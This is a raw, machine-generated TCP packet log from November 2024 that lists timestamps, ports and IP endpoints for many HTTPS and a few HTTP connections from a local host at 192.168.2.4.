                                  Nov 26, 2024 00:29:15.780642986 CET4434978413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.780719042 CET49784443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.780878067 CET49784443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.780889988 CET4434978413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.894967079 CET4434977913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.895143986 CET4434977913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.895193100 CET49779443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.895350933 CET49779443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.895368099 CET4434977913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.899175882 CET49785443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.899215937 CET4434978513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.899274111 CET49785443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.899457932 CET49785443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.899475098 CET4434978513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.918984890 CET4434978013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.919055939 CET4434978013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.919107914 CET49780443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.919231892 CET49780443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.919231892 CET49780443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.919248104 CET4434978013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.919256926 CET4434978013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.921664953 CET49786443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.921684980 CET4434978613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.921746969 CET49786443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.921901941 CET49786443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.921911001 CET4434978613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:16.024766922 CET4434978113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:16.024879932 CET4434978113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:16.024930000 CET4434978213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:16.024930000 CET49781443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:16.024995089 CET4434978213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:16.025038004 CET49782443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:16.025057077 CET49781443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:16.025057077 CET49781443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:16.025078058 CET4434978113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:16.025085926 CET4434978113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:16.025224924 CET49782443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:16.025224924 CET49782443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:16.025243998 CET4434978213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:16.025254965 CET4434978213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:16.028111935 CET49787443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:16.028148890 CET4434978713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:16.028204918 CET49787443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:16.028315067 CET49788443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:16.028394938 CET49787443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:16.028403997 CET4434978813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:16.028410912 CET4434978713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:16.028484106 CET49788443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:16.028590918 CET49788443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:16.028619051 CET4434978813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.087992907 CET44349783172.217.21.36192.168.2.4
                                  Nov 26, 2024 00:29:17.088313103 CET49783443192.168.2.4172.217.21.36
                                  Nov 26, 2024 00:29:17.088335037 CET44349783172.217.21.36192.168.2.4
                                  Nov 26, 2024 00:29:17.088834047 CET44349783172.217.21.36192.168.2.4
                                  Nov 26, 2024 00:29:17.089148045 CET49783443192.168.2.4172.217.21.36
                                  Nov 26, 2024 00:29:17.089236021 CET44349783172.217.21.36192.168.2.4
                                  Nov 26, 2024 00:29:17.129796982 CET49783443192.168.2.4172.217.21.36
                                  Nov 26, 2024 00:29:17.547940016 CET4434978413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.548456907 CET49784443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.548481941 CET4434978413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.548913002 CET49784443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.548918009 CET4434978413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.682032108 CET4434978513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.682657003 CET49785443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.682689905 CET4434978513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.683146954 CET49785443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.683152914 CET4434978513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.704849005 CET4434978613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.705256939 CET49786443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.705272913 CET4434978613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.705610037 CET49786443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.705612898 CET4434978613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.874563932 CET4434978813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.875241995 CET49788443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.875272989 CET4434978813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.875719070 CET49788443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.875727892 CET4434978813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.985768080 CET4434978413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.985879898 CET4434978413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.985943079 CET49784443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.986135006 CET49784443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.986154079 CET4434978413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.986166000 CET49784443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.986171961 CET4434978413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.989101887 CET49789443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.989146948 CET4434978913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:17.989228964 CET49789443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.989399910 CET49789443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:17.989414930 CET4434978913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.098860025 CET4972480192.168.2.4199.232.214.172
                                  Nov 26, 2024 00:29:18.132189035 CET4434978513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.132391930 CET4434978513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.132471085 CET49785443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.132555962 CET49785443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.132572889 CET4434978513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.135443926 CET49790443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.135520935 CET4434979013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.135613918 CET49790443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.135741949 CET49790443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.135771990 CET4434979013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.155785084 CET4434978613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.155849934 CET4434978613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.155900002 CET49786443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.156013966 CET49786443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.156013966 CET49786443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.156027079 CET4434978613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.156034946 CET4434978613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.158103943 CET49791443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.158149004 CET4434979113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.158221960 CET49791443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.158330917 CET49791443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.158344030 CET4434979113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.221566916 CET8049724199.232.214.172192.168.2.4
                                  Nov 26, 2024 00:29:18.221678972 CET4972480192.168.2.4199.232.214.172
                                  Nov 26, 2024 00:29:18.333687067 CET4434978813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.333755016 CET4434978813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.333806038 CET49788443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.333998919 CET49788443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.334018946 CET4434978813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.334055901 CET49788443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.334063053 CET4434978813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.336883068 CET49792443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.336913109 CET4434979213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:18.337009907 CET49792443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.337182045 CET49792443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:18.337193012 CET4434979213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:19.842483997 CET4434978913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:19.843099117 CET49789443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:19.843132019 CET4434978913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:19.843492985 CET49789443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:19.843501091 CET4434978913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:19.913165092 CET4434978713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:19.913748026 CET49787443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:19.913768053 CET4434978713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:19.914122105 CET49787443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:19.914129019 CET4434978713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:19.942962885 CET4434979113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:19.943439007 CET49791443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:19.943465948 CET4434979113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:19.943753958 CET49791443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:19.943763971 CET4434979113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:19.993725061 CET4434979013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:19.996581078 CET49790443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:19.996643066 CET4434979013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:19.996876001 CET49790443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:19.996891975 CET4434979013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.137433052 CET4434979213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.138081074 CET49792443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.138115883 CET4434979213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.138434887 CET49792443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.138439894 CET4434979213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.547394037 CET804973894.46.180.190192.168.2.4
                                  Nov 26, 2024 00:29:20.547604084 CET4973880192.168.2.494.46.180.190
                                  Nov 26, 2024 00:29:20.818892002 CET4434978713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.818953991 CET4434979113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.818958998 CET4434978713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.819021940 CET4434979113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.819050074 CET49787443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.819070101 CET49791443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.819243908 CET49791443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.819267988 CET4434979113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.819272995 CET49787443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.819272995 CET49787443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.819281101 CET49791443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.819287062 CET4434979113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.819289923 CET4434978713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.819298983 CET4434978713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.822233915 CET49793443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.822259903 CET4434979313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.822340965 CET49793443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.822380066 CET49794443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.822423935 CET4434979413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.822479010 CET49794443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.822506905 CET49793443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.822523117 CET4434979313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.822655916 CET49794443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.822668076 CET4434979413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.827908039 CET4434978913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.827989101 CET4434978913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.828041077 CET49789443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.828052044 CET4434979013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.828136921 CET49789443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.828151941 CET4434978913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.828165054 CET49789443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.828170061 CET4434978913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.828216076 CET4434979013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.828273058 CET49790443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.828342915 CET49790443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.828342915 CET49790443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.828382969 CET4434979013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.828408957 CET4434979013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.830286026 CET49795443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.830298901 CET4434979513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.830357075 CET49795443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.830360889 CET49796443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.830408096 CET4434979613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.830471992 CET49796443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.830492973 CET49795443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.830503941 CET4434979513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.830634117 CET49796443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.830663919 CET4434979613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.939738989 CET4434979213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.939805031 CET4434979213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.939861059 CET49792443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.940048933 CET49792443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.940064907 CET4434979213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.940073967 CET49792443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.940078974 CET4434979213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.942842007 CET49797443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.942893028 CET4434979713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:20.943159103 CET49797443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.943159103 CET49797443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:20.943203926 CET4434979713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:21.788912058 CET4973880192.168.2.494.46.180.190
                                  Nov 26, 2024 00:29:21.911308050 CET804973894.46.180.190192.168.2.4
                                  Nov 26, 2024 00:29:22.613025904 CET4434979313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.613588095 CET49793443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:22.613610983 CET4434979313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.614069939 CET49793443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:22.614075899 CET4434979313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.678430080 CET4434979413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.678965092 CET49794443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:22.678996086 CET4434979413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.679419994 CET49794443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:22.679425001 CET4434979413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.760348082 CET4434979513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.760850906 CET49795443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:22.760870934 CET4434979513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.761311054 CET49795443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:22.761315107 CET4434979513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.793489933 CET4434979613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.793560982 CET4434979713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.793931961 CET49796443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:22.794009924 CET4434979613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.794122934 CET49797443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:22.794142962 CET4434979713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.794549942 CET49797443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:22.794555902 CET4434979713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:22.794713020 CET49796443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:22.794728041 CET4434979613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.060606003 CET4434979313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.060667992 CET4434979313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.060936928 CET49793443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.060990095 CET49793443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.060990095 CET49793443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.061012983 CET4434979313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.061024904 CET4434979313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.063981056 CET49798443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.064074993 CET4434979813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.064193964 CET49798443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.064368010 CET49798443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.064400911 CET4434979813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.139458895 CET4434979413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.139520884 CET4434979413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.139647961 CET49794443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.139875889 CET49794443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.139892101 CET4434979413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.139900923 CET49794443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.139908075 CET4434979413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.143101931 CET49799443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.143155098 CET4434979913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.143251896 CET49799443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.143450975 CET49799443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.143467903 CET4434979913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.218739033 CET4434979513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.218816996 CET4434979513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.219007015 CET49795443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.219043016 CET49795443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.219065905 CET4434979513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.219078064 CET49795443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.219083071 CET4434979513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.221787930 CET49800443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.221827030 CET4434980013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.221903086 CET49800443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.222033024 CET49800443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.222044945 CET4434980013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.252197027 CET4434979613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.252370119 CET4434979613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.252603054 CET49796443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.252603054 CET49796443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.252677917 CET49796443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.252717972 CET4434979613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.254889965 CET4434979713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.254965067 CET4434979713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.255059958 CET49797443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.255158901 CET49797443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.255179882 CET4434979713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.255192995 CET49797443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.255198956 CET4434979713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.255467892 CET49801443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.255505085 CET4434980113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.255568027 CET49801443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.255768061 CET49801443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.255775928 CET4434980113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.257507086 CET49802443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.257519960 CET4434980213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:23.257601023 CET49802443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.257728100 CET49802443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:23.257735968 CET4434980213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:24.850756884 CET4434979813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:24.851332903 CET49798443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:24.851397991 CET4434979813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:24.851713896 CET49798443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:24.851727962 CET4434979813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:24.987211943 CET4434980113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:24.987701893 CET49801443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:24.987730980 CET4434980113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:24.988220930 CET49801443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:24.988224983 CET4434980113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.039110899 CET4434980013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.039582014 CET49800443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.039608955 CET4434980013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.040007114 CET49800443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.040013075 CET4434980013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.114749908 CET4434980213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.115298986 CET49802443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.115314960 CET4434980213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.115734100 CET49802443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.115745068 CET4434980213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.301008940 CET4434979813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.301073074 CET4434979813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.301148891 CET49798443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.301362991 CET49798443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.301414967 CET4434979813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.301445961 CET49798443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.301461935 CET4434979813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.304598093 CET49803443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.304636955 CET4434980313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.304732084 CET49803443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.304936886 CET49803443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.304946899 CET4434980313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.426412106 CET4434980113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.426495075 CET4434980113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.426784992 CET49801443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.426829100 CET49801443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.426829100 CET49801443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.426853895 CET4434980113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.426862001 CET4434980113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.429868937 CET49804443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.429914951 CET4434980413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.430006027 CET49804443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.430169106 CET49804443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.430181026 CET4434980413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.488079071 CET4434980013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.488157034 CET4434980013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.488445044 CET49800443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.488445044 CET49800443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.488481998 CET49800443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.488496065 CET4434980013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.491063118 CET49805443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:25.491111040 CET4434980513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:25.491179943 CET49805443192.168.2.413.107.246.63
